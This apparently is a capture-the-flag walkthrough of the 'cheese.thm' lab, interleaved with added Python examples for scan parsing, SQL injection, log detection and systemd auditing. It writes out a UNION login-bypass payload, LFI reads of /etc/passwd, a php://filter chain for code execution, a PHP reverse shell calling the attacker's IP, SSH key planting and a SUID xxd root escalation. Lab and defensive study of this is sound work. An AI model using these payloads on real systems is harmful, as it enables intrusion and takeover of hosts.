SF:Door\x205qRocCzvX/\n")%r(DNSStatusRequestTCP,25,"\xff\xfb\x03\xff\xfb0\
SF:xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(Help,25,"\xff\x
SF:fb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r
SF:(TerminalServerCookie,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\
SF:r\rFrontDoor\x205qRocCzvX/\n")%r(Kerberos,25,"\xff\xfb\x03\xff\xfb0\xff
SF:\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(SMBProgNeg,25,"\xf
SF:f\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n"
SF:)%r(X11Probe,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontD
SF:oor\x205qRocCzvX/\n")%r(FourOhFourRequest,25,"\xff\xfb\x03\xff\xfb0\xff
SF:\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(LPDString,25,"\xff
SF:\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")
SF:%r(LDAPSearchReq,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFr
SF:ontDoor\x205qRocCzvX/\n")%r(LDAPBindReq,25,"\xff\xfb\x03\xff\xfb0\xff\x
SF:fb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(SIPOptions,25,"\xff\
SF:xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%
SF:r(LANDesk-RC,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontD
SF:oor\x205qRocCzvX/\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1723-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r
SF:(NULL,A,"\x01\x0400000\rD\n")%r(GenericLines,A,"\x01\x0400000\rD\n")%r(
SF:GetRequest,A,"\x01\x0400000\rD\n")%r(HTTPOptions,A,"\x01\x0400000\rD\n"
SF:)%r(RTSPRequest,A,"\x01\x0400000\rD\n")%r(RPCCheck,A,"\x01\x0400000\rD\
SF:n")%r(DNSVersionBindReqTCP,A,"\x01\x0400000\rD\n")%r(DNSStatusRequestTC
SF:P,A,"\x01\x0400000\rD\n")%r(Help,A,"\x01\x0400000\rD\n")%r(SSLSessionRe
SF:q,A,"\x01\x0400000\rD\n")%r(TerminalServerCookie,A,"\x01\x0400000\rD\n"
SF:)%r(TLSSessionReq,A,"\x01\x0400000\rD\n")%r(Kerberos,A,"\x01\x0400000\r
SF:D\n")%r(SMBProgNeg,A,"\x01\x0400000\rD\n")%r(X11Probe,A,"\x01\x0400000\
SF:rD\n")%r(FourOhFourRequest,A,"\x01\x0400000\rD\n")%r(LPDString,A,"\x01\
SF:x0400000\rD\n")%r(LDAPSearchReq,A,"\x01\x0400000\rD\n")%r(LDAPBindReq,A
SF:,"\x01\x0400000\rD\n")%r(SIPOptions,A,"\x01\x0400000\rD\n")%r(LANDesk-R
SF:C,A,"\x01\x0400000\rD\n")%r(TerminalServer,A,"\x01\x0400000\rD\n")%r(NC
SF:P,A,"\x01\x0400000\rD\n")%r(NotesRPC,A,"\x01\x0400000\rD\n")%r(JavaRMI,
SF:A,"\x01\x0400000\rD\n")%r(WMSRequest,A,"\x01\x0400000\rD\n")%r(oracle-t
SF:ns,A,"\x01\x0400000\rD\n")%r(ms-sql-s,A,"\x01\x0400000\rD\n")%r(afp,A,"
SF:\x01\x0400000\rD\n")%r(giop,A,"\x01\x0400000\rD\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|VoIP phone|general purpose|WAP|proxy server|webcam
Running (JUST GUESSING): Google Android 4.4.X|4.0.X (90%), Cisco embedded (88%), Linux 3.X (88%), Linksys embedded (88%), WebSense embedded (88%), AXIS embedded (87%)
OS CPE: cpe:/o:google:android:4.4.0 cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:google:android:4.0.4
Aggressive OS guesses: Android 4.4.0 (90%), Cisco CP-DX80 collaboration endpoint (Android) (88%), Linux 3.6 - 3.10 (88%), Linksys EA3500 WAP (88%), Websense Content Gateway (88%), Axis M3006-V network camera (87%), Android 4.0.4 (Linux 2.6) (87%), Linux 2.6.18 - 2.6.24 (87%), Linux 3.16 (87%), Linux 4.4 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 37.274 days (since Fri Aug 30 12:10:58 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: qnBE-or, w; OS: Linux; Device: VoIP adapter; CPE: cpe:/o:linux:linux_kernel, cpe:/h:motorola:vt1000v
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 150.54 ms 10.11.0.1
2 150.60 ms cheese.thm (10.10.94.254)
By specifying a value of 20 for the --top-ports switch, Nmap scanned the top 20 most commonly used ports. Let us start by checking out the web-related ports, 80 and 8080.
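As an added example (not part of the original writeup), here is a small Python parser for the normal-format (-oN) scan output above. It splits the open ports into those Nmap matched to a service fingerprint and those it only guessed (the trailing ? in the SERVICE column), which is a quick way to decide where to look first when a host answers on this many ports. The sample lines are constructed from the scan output above; the parser is an assumption about the -oN line layout, not an Nmap-provided API.

```python
import re

# Constructed sample: a handful of lines in the shape of the nmap -oN output above.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
111/tcp open http Network Associates ePolicy Orchestrator 94663073
8080/tcp open http-proxy?
|_http-title: The Cheese Shop
"""

# port/proto, state, service, optional version string (everything after the service).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Return one dict per port line; script output lines (|_ ...) are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        rows.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            # A trailing '?' means nmap saw the port open but no probe matched a known service.
            "service": service.rstrip("?"),
            "identified": not service.endswith("?"),
            "version": version or "",
        })
    return rows


def triage(rows):
    """Split open ports into fingerprint-matched services and unmatched guesses."""
    identified = [r for r in rows if r["state"] == "open" and r["identified"]]
    guessed = [r for r in rows if r["state"] == "open" and not r["identified"]]
    return identified, guessed


if __name__ == "__main__":
    matched, unmatched = triage(parse_nmap(SAMPLE_NMAP))
    for r in matched:
        print(f"{r['port']}/{r['proto']:<4} {r['service']:<12} {r['version']}")
    print("unmatched (service guessed only):", [r["port"] for r in unmatched])
```

On the full scan above most of the 20 ports fall into the guessed bucket or carry a version string that does not fit the port, so the two ports the writeup goes on to examine (80 and 8080) are also the only web ports a parser like this would rank as worth a look first.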
Checking out port 8080:
We get this command:
/bin/bash -c {perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==} $_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));
Let us decode the base64 content from it:
Command:
echo 'cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==' | base64 -d
print "PWNED\n" x 5 ; $_=`pwd`; print "\nuploading your home directory: ",$_,"... \n\n";
The command decodes a base64 string and evaluates it as Perl code that prints PWNED five times, runs pwd to fetch the current working directory, and prints a message about uploading your home directory.
Nothing of interest here. Let us now move on to port 80.
Checking out port 80:
We can now check out the Login option.
The first approach to consider when coming across a login page like this is to check whether it is vulnerable to SQL injection.
Intercepting the Login request in Burp:
Testing for SQL injection:
We can try a basic UNION-based payload to determine the number of columns in the query.
The payload that worked:
' UNION SELECT 1,2,3; -- -
'+UNION+SELECT+1,2,3%3b+--+- (URL encoded)
This means the query has 3 columns.
Upon sending this request we get a 302 status code in the response, i.e. a redirection.
Once Follow redirection is selected, we successfully get redirected to the Admin Panel:
As expected, we indeed have 3 columns - Orders, Messages & Users.
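To show why the payload above works, here is an added example (not code from the writeup or from the Cheese Shop application) of the two ways a login query can be built, run against an in-memory SQLite table. The real back-end database and schema are unknown, so the column names and the single user row (with a placeholder in place of the real hash) are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for the shop's user table; the real schema and the
# real hash are unknown, so the column names and this row are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'comte', 'placeholder-hash')")
    conn.commit()
    return conn


# The payload from the writeup, exactly as it was sent (before URL encoding).
PAYLOAD = "' UNION SELECT 1,2,3; -- -"


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so user input becomes SQL."""
    query = (
        "SELECT id, username, password FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Binds the same input as parameters, so it is only ever compared as a value."""
    query = "SELECT id, username, password FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The UNION appends an attacker-chosen row and the comment drops the password check,
    # so the "login" succeeds with the row (1, 2, 3).
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    # With parameters the same text is just a username nobody has: no rows, no login.
    print("parameterised:", login_safe(db, PAYLOAD, "anything"))
```

The vulnerable path returns a row with exactly three values because a UNION must match the column count of the original SELECT, which is the property the 1,2,3 probe in the writeup relies on; the parameterised path returns nothing, so the fix for this class of bug is in how the query is built, not in filtering the input.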
The endpoint is /secret-script.php, with a URL parameter named file, like so: /secret-script.php?file=
We may have a potential LFI (Local File Inclusion) vulnerability here. Before diving deeper, let's see if SQLMap can uncover any valuable information.
Running SQLMap:
The request file:
Command:
sqlmap -r request --dbs --dump --batch
It found the /secret-script.php endpoint, and we also got a password hash for a user named comte. Attempting to crack this hash did not yield any results.
Also, the resource paths (orders.html, messages.html, users.html) could be found via directory busting:
Command:
gobuster dir -u http://cheese.thm/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html
The users.html path:
http://cheese.thm/users.html
http://cheese.thm/secret-script.php?file=php://filter/resource=users.html
The messages.html path:
http://cheese.thm/messages.html
http://cheese.thm/secret-script.php?file=php://filter/resource=messages.html
The orders.html path:
http://cheese.thm/orders.html
http://cheese.thm/secret-script.php?file=php://filter/resource=orders.html
Now let us get back to the possible LFI on the file parameter. As we have noticed, any valid file present on the server is fetched when passed as the value of that parameter. This can be abused to read sensitive files on the server.
Trying to read the /etc/passwd file:
http://cheese.thm/secret-script.php?file=/etc/passwd
http://cheese.thm/secret-script.php?file=php://filter/resource=/etc/passwd
And we indeed have a successful LFI.
We now know that the comte user we came across in the SQLMap output is a user on the machine. At this point, we have to find a way to turn the LFI we currently have into RCE (Remote Code Execution).
LFI to RCE:
The PHP filter chain method (php_filter_chain_generator.py) referenced above is what leads us to achieve RCE.
We can first try out the example shown to generate a phpinfo() chain.
Command:
python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
Now the payload that it generated has to be passed as the value of the file parameter:
http://cheese.thm/secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM11
61.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
Requesting the generated URL gives us the phpinfo() page, so we now have a working RCE.
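On the defensive side, requests like the one above leave a clear trace in the web server's access log. The following is an added example, not from the original write-up or the room, that scans access-log lines for stream wrappers such as php://filter reaching the file parameter; the combined log format, the sample lines and the RFC 5737 addresses are assumptions made for the demo.

```python
"""Detection for the php://filter requests used above.

Added as an illustration; not part of the original write-up or the room. It
scans web-server access logs for requests that pass a PHP stream wrapper in a
query parameter. Generated filter chains are long, often URL-encoded and built
from repeated convert.iconv / convert.base64 stages, so the check looks for the
wrapper and counts stages instead of matching one specific chain. The log lines
at the bottom are constructed for the demo (RFC 5737 addresses).
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format prefix: client identd user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Stream wrappers that a client should never be able to place in a file-inclusion parameter.
WRAPPER_RE = re.compile(r'\b(php|data|phar|expect|zip|glob|compress\.zlib)://', re.I)
STAGE_RE = re.compile(r'convert\.(?:iconv|base64-(?:en|de)code)', re.I)


def analyse_request(target: str) -> Optional[Dict]:
    """Return a finding if a query parameter of the request target carries a stream wrapper."""
    parts = urlsplit(target)
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)  # parse_qs decoded once; a second pass catches double encoding
            m = WRAPPER_RE.search(value)
            if not m:
                continue
            stages = len(STAGE_RE.findall(value))
            # Decoding a chain into php://temp and including it is the filter-chain-to-RCE pattern;
            # a single base64-encode stage is the classic source-disclosure read.
            writes_temp = "resource=php://temp" in value.lower()
            return {
                "path": parts.path,
                "param": name,
                "wrapper": m.group(1).lower() + "://",
                "filter_stages": stages,
                "resource": value.rsplit("/resource=", 1)[1] if "/resource=" in value else None,
                "severity": "high" if writes_temp or stages >= 2 else "medium",
            }
    return None


def scan_log(lines: List[str]) -> List[Dict]:
    """Apply analyse_request to each parsable access-log line and tag hits with client and time."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = analyse_request(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=int(m.group("status")))
            findings.append(hit)
    return findings


# Constructed sample: two wrapper requests (one double-encoded) and two benign ones.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Mar/2024:14:02:11 +0000] "GET /secret-script.php?file=php://filter/'
    'convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|'
    'convert.base64-decode/resource=php://temp HTTP/1.1" 200 51234',
    '198.51.100.23 - - [10/Mar/2024:14:02:40 +0000] "GET /secret-script.php?file='
    '%2570hp%253A%252F%252Ffilter%252Fconvert.base64-encode%252Fresource%253Dindex.php HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/Mar/2024:14:03:02 +0000] "GET /secret-script.php?file=about.html HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Mar/2024:14:03:05 +0000] "GET /index.html HTTP/1.1" 200 3301',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['severity'].upper()} {hit['path']} {hit['param']}={hit['wrapper']}"
              f" stages={hit['filter_stages']} resource={hit['resource']}")
```

Feed it real lines with `scan_log(open("/var/log/apache2/access.log").read().splitlines())`; the double-decoding pass matters because the filter chain is usually sent percent-encoded.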
Now we can use a PHP reverse shell as the chain in the command. The IP specified in the payload is the tun0 interface IP.
Setting up a listener on port 443:
Command:
python3 php_filter_chain_generator.py --chain '<?php $sock=fsockopen("10.11.75.84",443);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>'
The reverse shell command is passed as an argument to the --chain switch, enclosed in PHP tags, and the generated chain is again requested through the file parameter of secret-script.php.
We have got a connection as www-data.
Upgrading the current shell a little.
Commands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Checking out the /home directory:
We find the user flag in comte's home directory, but we (www-data) fall under others and have no permissions at all on the flag file, so reading it is not possible at this point.
We can now get inside the .ssh directory:
We, as others, have both read and write permissions (rw-) on the authorized_keys file. We can now generate an SSH key pair and place the public key within this file.
Command:
ssh-keygen -t rsa
The public key:
Placing it on the target machine:
Now we can SSH in as comte:
Command:
ssh comte@cheese.thm
Now we can fetch the user flag:
We can now check comte's sudo rights:
We are allowed to run a few commands related to a systemd timer unit file named exploit.timer, as any user and without being prompted for a password. This is our way to root.
Timers are unit files that control when .service units (or other events) are activated, so we will probably end up finding a .service file of importance later.
Let us first find the location of the exploit.timer file.
Command:
find / -name exploit.timer 2> /dev/null
Checking out the file and its permissions:
The timer file's owner and group are both root. Since we (comte) fall under others, we have read, write and execute permissions (rwx) on the file.
We can now try to start exploit.timer based on the sudoers entry.
It failed, saying there is a bad setting within the file, and it tells us to run systemctl status exploit.timer to find out more about the issue. Let us go ahead and do the same.
Upon running the command we notice that this timer unit file is set to trigger a .service file named exploit.service. We have indeed found the file we talked about above.
Again, let us start by finding where this .service file is located.
Command:
find / -name exploit.service 2> /dev/null
It is located in the same directory as the exploit.timer file.
Checking out the file:
When the service gets started because exploit.timer triggers it, the command that will be run is this:
/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
It copies the xxd utility to the /opt directory and sets the SUID bit on it. Since the timer is started through sudo and systemd runs the service it triggers as root, the root-owned xxd binary gets copied without any permission issues and ends up with the bit set, which leads to an easy privilege escalation.
The /opt directory is currently empty, without any files.
Now let us get back to the error in the exploit.timer file. It occurred because no value was set for the OnBootSec directive, which expects one: it specifies how long after boot the timer should fire.
The value we specify doesn't affect our approach at all because, as we saw, we can start exploit.timer manually with sudo privileges, so it will end up triggering exploit.service immediately.
For the sake of specifying a value for the OnBootSec directive, let us set it to 30 minutes:
Now the systemd daemon needs to be reloaded for the changes to take effect.
Command:
sudo systemctl daemon-reload
Now let us start exploit.timer.
Command:
sudo /bin/systemctl start exploit.timer
All that is left to check now is the /opt directory. If everything worked as intended, the root-owned xxd binary should be in there with the SUID bit set.
And we have it. Since the SUID bit is set, the binary runs with the permissions of its owner, root in this case.
This leaves us with a simple xxd privilege escalation:
We first set the LFILE variable to the file we want to read; in this case we can directly read the root.txt file:
LFILE=/root/root.txt
./xxd "$LFILE" | xxd -r
We now have the root flag.
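Each step of the escalation above maps to a condition a host audit can catch: a root-owned unit file that others can write, a timer that systemd rejects for a missing trigger value, and a service whose ExecStart plants a setuid copy of a binary. The script below is an added example, not the room's or the author's code; the unit texts it ships with are constructed, with only the ExecStart line taken from the write-up.

```python
"""Audit checks for the systemd timer/service path used above.

Added as an illustration, not part of the original write-up or the room. It flags
what made the escalation possible: a unit file writable by a non-root user, a
[Timer] trigger directive with no value (the "bad setting" error) and an ExecStart
that copies a binary and marks it setuid. Unit texts at the bottom are constructed;
only the ExecStart line comes from the write-up.
"""
import os
import re
import stat
from typing import Dict, List

# A [Timer] section needs at least one of these, with a value, to be loadable.
TIMER_TRIGGERS = ("OnActiveSec", "OnBootSec", "OnStartupSec",
                  "OnUnitActiveSec", "OnUnitInactiveSec", "OnCalendar")
# chmod adding a setuid/setgid bit, symbolic (+s, u+s, +sx) or numeric (4755, 2755, 6755),
# and cp into a directory an unprivileged user can reach afterwards.
SETUID_RE = re.compile(r"\bchmod\b[^;&|]*?(?:\+[a-z]*s|\b[2-7][0-7]{3}\b)")
STAGING_RE = re.compile(r"\bcp\b[^;&|]*\s/(?:opt|tmp|var/tmp|dev/shm)/")


def parse_unit(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Minimal unit-file parser; keys may repeat, so each value is a list."""
    unit: Dict[str, Dict[str, List[str]]] = {}
    section: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = unit.setdefault(line[1:-1], {})
            continue
        key, _, value = line.partition("=")
        section.setdefault(key.strip(), []).append(value.strip())
    return unit


def timer_findings(text: str) -> List[str]:
    timer = parse_unit(text).get("Timer", {})
    out = [f"{d}= is present but has no value"
           for d in TIMER_TRIGGERS if d in timer and all(v == "" for v in timer[d])]
    if not any(v for d in TIMER_TRIGGERS for v in timer.get(d, [])):
        out.append("no trigger directive carries a value; systemctl reports a bad setting")
    return out


def service_findings(text: str) -> List[str]:
    out = []
    for cmd in parse_unit(text).get("Service", {}).get("ExecStart", []):
        if SETUID_RE.search(cmd):
            out.append(f"ExecStart adds a setuid/setgid bit: {cmd}")
        if STAGING_RE.search(cmd):
            out.append(f"ExecStart copies a file into a staging directory: {cmd}")
    return out


def perm_findings(path: str, mode: int, uid: int) -> List[str]:
    """mode/uid as from os.stat(): unit files must be root-owned and not writable by others."""
    out = []
    if mode & stat.S_IWOTH:
        out.append(f"{path} is world-writable")
    elif mode & stat.S_IWGRP:
        out.append(f"{path} is group-writable")
    if uid != 0:
        out.append(f"{path} is not owned by root (uid {uid})")
    return out


def audit_tree(root: str = "/etc/systemd/system") -> Dict[str, List[str]]:
    """Run all checks over the regular unit files below root (live-host use)."""
    report: Dict[str, List[str]] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if not name.endswith((".timer", ".service")) or os.path.islink(path):
                continue  # .wants/ entries are symlinks; their targets are audited in place
            try:
                st = os.stat(path)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            findings = perm_findings(path, st.st_mode, st.st_uid)
            findings += timer_findings(text) if name.endswith(".timer") else service_findings(text)
            if findings:
                report[path] = findings
    return report


# Constructed unit texts modelled on the room's exploit.timer / exploit.service.
TIMER_TEXT = "[Unit]\nDescription=Exploit Timer\n\n[Timer]\nOnBootSec=\n\n[Install]\nWantedBy=timers.target\n"
SERVICE_TEXT = ("[Unit]\nDescription=Exploit Service\n\n[Service]\nType=oneshot\n"
                'ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"\n')
```

On a live host, `audit_tree()` walks /etc/systemd/system and returns only the units with findings; the per-unit functions take plain text and os.stat() values, so they also work on files collected from another machine.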
Room solved!!